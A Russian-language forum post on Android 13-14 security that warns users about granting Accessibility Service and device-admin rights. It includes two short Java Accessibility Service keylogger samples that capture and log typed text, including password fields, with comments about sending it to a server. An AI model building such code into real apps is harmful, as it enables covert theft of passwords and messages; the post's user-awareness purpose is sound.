Информация Особенности малвари в Андроид 13-14

[X-Shar]

Вообще я тут создал тему:На заметку - «Настройки с ограниченным доступом» в Android 13 и 14

Но решил раскрыть тему настроек, вообще сама по себе система Андроид хорошо защищена, но важно соблюдать так-сказать "Гигиену" и не давать приложением критичные права, а также не включать лишнее, например отладку по USB, рутовать и т.д.

Думаю это понятно, но давайте разбираться на примерах.

Вообще какие угрозы с вашим мобильником могут быть:

1)Мобилу украли, или потеряли, что тут может-быть - Это конечно утечка данных, особенно если используете банковские приложения, это может-быть очень критично.

Что делать ?

Скажу что современные ОС Андроид 13-14 имеют шифрование всего накопителя, именно поэтому если поставить хороший пароль, кроме биометрии, хотя-бы 12 значный, его уже тяжеловато будет взломать, главное сами не забудьте его.)

Также рекомендую поставить пароль на симку.

Вот тут еще важно не включать режим разработчика и отладку по USB, иначе злоумышленник подключится по USB и при помощи специального софта взломает ваш девайс, то-же самое касается и рутирования.)

2)Вот теперь подбираемся к критичным настройкам, которые в современном Андроиде пользователь должен вручную установить для приложений, это так-называемые "Особый доступ (спец. возможности)" и "Администраторы устройства".

Второе разрешение сделает запрет удаления вашего приложения, а первое практически полный доступ к устройству.)

Если приложению предоставлен особый доступ через службу специальных возможностей (Accessibility Service) на Android, оно может получать доступ к различным аспектам взаимодействия пользователя с устройством. Этот доступ предоставляет приложениям множество возможностей, включая:

1. Слежение за действиями пользователя: Приложение может отслеживать, какие действия выполняет пользователь, например, какие кнопки нажимаются, какие приложения открываются и какие элементы пользователь выбирает на экране.
2. Доступ к содержимому экрана: Приложение может читать текст, отображаемый на экране, включая содержимое приложений. Это позволяет получать доступ к конфиденциальной информации, такой как пароли, сообщения и другие личные данные.
3. Интеракция с элементами интерфейса: Приложение может выполнять действия от имени пользователя, такие как нажатие кнопок и ввод текста.
4. Запись ввода с клавиатуры: Приложение может отслеживать и записывать все нажатия клавиш, что позволяет перехватывать вводимые пользователем пароли.

Вот несколько примеров приложений, которые могут использовать возможности службы специальных возможностей (Accessibility Service) для потенциального перехвата паролей и действий пользователя:

1. Мошеннические банковские приложения: Такие приложения могут маскироваться под легитимные банковские приложения, запрашивая доступ к службам специальных возможностей, чтобы перехватывать логины и пароли при вводе.
2. Кейлоггеры: Приложения, которые регистрируют все нажатия клавиш пользователя, могут использовать службы специальных возможностей для перехвата введенных данных, включая пароли и сообщения.
3. Фишинговые приложения: Приложения, которые отображают фальшивые экраны входа (например, вход в Google или Facebook), могут использовать возможности специальных возможностей для перехвата введенных пользователем данных.
4. Программы для родительского контроля или слежки: Некоторые легитимные приложения для родительского контроля могут использовать службы специальных возможностей для отслеживания действий детей, но если такие программы попадают в руки злоумышленников, они могут быть использованы для слежки за любыми действиями пользователя.
5. Приложения для управления паролями: Некоторые недобросовестные приложения для управления паролями могут запрашивать доступ к службам специальных возможностей, чтобы перехватывать и записывать пароли, когда пользователь вводит их в другие приложения.
6. Adware и Spyware: Эти типы вредоносных программ могут использовать службы специальных возможностей для отслеживания действий пользователя и сбора личной информации для рекламных или шпионских целей.

Примеры кода, использующего Accessibility Service (Тривиальный код, ничего сложного)​

​

1. Пример перехвата ввода пользователя с помощью Accessibility Service​

Этот пример показывает, как злоумышленник может использовать Accessibility Service для перехвата текста, вводимого пользователем.​

Скопировать в буфер обмена

import android.accessibilityservice.AccessibilityService;
import android.view.accessibility.AccessibilityEvent;
import android.util.Log;

public class KeyLoggerAccessibilityService extends AccessibilityService {

    private static final String TAG = "KeyLogger";

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
            CharSequence text = event.getText().toString();
            Log.d(TAG, "User input: " + text);
            // Здесь можно сохранять перехваченные данные в файл или отправлять на сервер
        }
    }

    @Override
    public void onInterrupt() {
        // Обработка прерывания сервиса
    }

    @Override
    protected void onServiceConnected() {
        super.onServiceConnected();
        AccessibilityServiceInfo info = new AccessibilityServiceInfo();
        info.eventTypes = AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED;
        info.feedbackType = AccessibilityServiceInfo.FEEDBACK_ALL_MASK;
        info.notificationTimeout = 100;
        setServiceInfo(info);
    }
}

Этот сервис отслеживает все изменения текста, которые происходят в пользовательском интерфейсе, и логирует их. Это может быть использовано злоумышленниками для перехвата конфиденциальной информации, такой как пароли, сообщения и другие личные данные.

2. Пример перехвата пароля с использованием Accessibility Service​

Этот пример показывает, как злоумышленник может использовать Accessibility Service для перехвата текста, вводимого пользователем в элементе EditText.​

Скопировать в буфер обмена

import android.accessibilityservice.AccessibilityService;
import android.view.accessibility.AccessibilityEvent;
import android.util.Log;
import android.accessibilityservice.AccessibilityServiceInfo;
import android.view.accessibility.AccessibilityNodeInfo;

public class PasswordInterceptorService extends AccessibilityService {

    private static final String TAG = "PasswordInterceptor";

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
            AccessibilityNodeInfo source = event.getSource();
            if (source != null && source.getClassName().equals("android.widget.EditText")) {
                CharSequence text = source.getText();
                if (text != null) {
                    Log.d(TAG, "EditText input: " + text.toString());
                    // Здесь можно сохранять перехваченные данные в файл или отправлять на сервер
                }
            }
        }
    }

    @Override
    public void onInterrupt() {
        // Обработка прерывания сервиса
    }

    @Override
    protected void onServiceConnected() {
        super.onServiceConnected();
        AccessibilityServiceInfo info = new AccessibilityServiceInfo();
        info.eventTypes = AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED | AccessibilityEvent.TYPE_VIEW_FOCUSED;
        info.feedbackType = AccessibilityServiceInfo.FEEDBACK_ALL_MASK;
        info.notificationTimeout = 100;
        setServiceInfo(info);
    }
}

Я не буду приводить много примеров, вообще в сети много кликеров, кейлогеров и т.д. для Андроида, при желании можно найти и сделать свои приложения.
Это как примеры, что ничего сложного нет.

Но самая большая сложность, это заставить пользователя дать приложению права на доступ, так-что будьте осторожны!